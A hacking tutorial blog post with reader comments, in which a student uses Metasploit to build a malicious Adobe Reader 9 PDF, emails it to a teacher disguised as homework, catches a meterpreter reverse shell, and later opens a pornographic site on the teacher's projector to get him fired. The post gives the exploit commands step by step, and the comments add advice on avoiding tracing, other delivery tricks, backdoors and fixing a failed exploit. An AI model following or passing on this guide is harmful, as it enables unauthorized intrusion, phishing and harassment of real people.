Real Scenarios #2: The Creepy Teacher [Part 2]

In part one of this tutorial we found out that your English teacher is a paedophile, by using a Man in the Middle attack to intercept his internet traffic.

Now you're faced with the dilemma of how to alert other staff at the school to how creepy he is without letting on that you've been sniffing around the school network...

Approach

Real Scenarios #2: The Creepy Teacher [Part 2] — *Image via smartandstrong.com*

You need to find a way to tell the other staff to what you've found, but without them suspecting that you're involved.

A good start is to get control of his computer, so you think about how, and do some reconnaissance, but you don't come up with anything.

Inspiration!

One day in a lesson, you see him open a PDF on the projector, using Adobe Reader 9!

Since you've practised hacking Reader 9 in your Virtual Hacking Lab at home , you know that Adobe Reader 9 is vulnerable to an exploit that can be deployed just by opening a malicious PDF.

If you can create a PDF containing the exploit and get him to open it, you can take control of his computer!

Step 1: Fire Up Metasploit

You're going to use Metasploit to create the malicious PDF, so type

msfconsole

at the terminal to open it.

Once the Metasploit Framework has loaded up, you type

msf > use exploit/windows/fileformat/adobe_pdf_embedded_exe

to select the appropriate exploit, then use

set payload windows/meterpreter/reverse_tcp

to set the payload.

Step 2: Configure Options

You need to provide a PDF for Metasploit to embed the exploit in, so you create a PDF called answers.pdf using Reader 9, then feed it to metasploit:

set INFILENAME answers.pdf

and

set FILENAME answers.pdf

set the relevant file options, and then it's simply a case of providing your school network IP address for the exploit to connect back to:

set LHOST 192.168.1.78

Step 3: Create

exploit

This creates the PDF, at the location /root/.msf4/local/answers.pdf

Step 4: Social Engineering

Now that you have your PDF, you need to somehow get your teacher to open it.

You decide to email it to him one lunchtime, telling him that it contains your homework answers.

You sneak off, send the email, then open the metasploit handler to receive control of his computer, by typing

use exploit/multi/handler

at the metasploit prompt.

You configure the options:

set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.1.78

Then run the hander:

exploit

Step 5: Wait

After a few minutes, you get a connection!

Straight after, you email him a document with your actual homework in, saying you accidentally send an empty document, so he doesn't suspect anything.

Step 6: Scheming...

Success! You have control of his computer!

Now how can you use that fact to get him fired?

Step 7: The Idea

It's assembly tomorrow, and the whole school; staff and pupils, will be in one room, and guess what? The English teacher is doing a short powerpoint presentation about how to write applications (no, not that type of application) for college. If only we could get something less desirable than his presention appear on the projector...

The stage is set!

Step 8: Assembly

The day comes, and you're sitting at the back of the hall watching the headteacher drone on about grades. She finishes, and as your English teacherstands up and plugs his laptop into the projector to begin his presentation, you slip out of the door at the back of the hall.

Run Run Run!

You grab your laptop from your locker, then type this into the remote shell on his computer (now plugged into the projecter).

explorer "http://pornhub.com"

You hit enter, and smile as you imagine the scene in the hall as his default browser (probably internet explorer, another reason to fire him) cheerfully pops up and displays pornhub.com on the projector.

It might not be concrete evidence, but it's enough for an investigation to be started, which is enough.

Mission Complete

Two days later, he's fired. Good Job.

Just updated your iPhone? You'll find new emoji, enhanced security, podcast transcripts, Apple Cash virtual numbers, and other useful features. There are even new additions hidden within Safari. Find out what's new and changed on your iPhone with the iOS 17.4 update.

15 Comments

I love this series! Amazing, thanks!

Damn, "probably internet explorer, another reason to fire him" That made me laugh real hard, Anyways nice idea and nice presentation +1

+1 for exploiting the 'what's been seen cannot be unseen' factor. Public exposure with the projector incident is good enough to have lots of witness of his wrong deeds.

But your pdf exploit won't be unseen as well. In case of an official investigation, you left a track of your attack both in the mail server and in his pc, with something that can be tracked directly to you, as you sent him as an homework attachment.

Maybe he will be too busy with the lawyers to connect the trace back to you, maybe the investigators will understand your tip and close an eye, for greater good, but one thing is sure: never tie an evidence back to you.

The PDF exploit would be still good if, for example, was delivered as part of another MiTM attack while he's browsing the school portal, and is forced to download a pdf for "school_board_administration_urgent.pdf", or pretending to be the school POP3 server and delivering the same file. It would still leave a trace (only on his pc this time), but that can be hardly lead back to you.

Great serie anyway ! I like your real scenarios !

Thanks for the feedback.

Love the idea of the school portal, I was toying with different ways of delivering the exploit, but I decided to keep it simple for the sake of the concept.

Another great tutorial! I'm looking forward to even more of these real life scenarios! :) +1
(Also you may have misspelled "pedophile" in the first paragraph.)

Thanks a lot.
Well I'm from the UK, and in England we tend to spell it with an "a", don't know why :P

Great... how can we evade getting traced here ?

It depends on how untraceable you want/need to be.
There are many different approaches to delivering the payload, the malicious PDF was just one.
TripHat suggested an alternate way of delivering it, above.

Also I couldn't create a PDF in adobe reader 9 can you give me one ?

I like to menction the LAN IP not work in WAN so i need to create a DDNS to redirect the trafic to my home > my PC.

After i received the meterpreter (or shell? Need upgrade with msf>search shelltometerpreter) i need to migrate the ps (msf>migrate auto), then create a backdoor (still needing a remote partner to try some cases).

Won't this be caught by the antivirus or firewall?

But, that aside, say he has been using an extra layer of security, like an encrypted connection maybe. Or it just happens that he's been using something other than Adobe Reader 9.

And (ideal situation in India) taking it to a school where this situation is not possible, say you can not sneak away (the doors are closed, bringing electronics in school is not allowed), there is no projector, or the assembly is just never given to teachers like that.

I guess you'd just have to fight him outside school?

-The Joker

This is just designed to be an example of how hacking might be applied in one particular situation, and is by no means a comprehensive guide as to how to compromise a system :P

Hmm, I keep getting "Exploit failed: The following options failed to validate: INFILENAME". What could be the source of this problem?

That message is usually a result of either no file being available or the wrong path to the file.

So how can I edit the path to lead to PDF file? Where does my file need to be?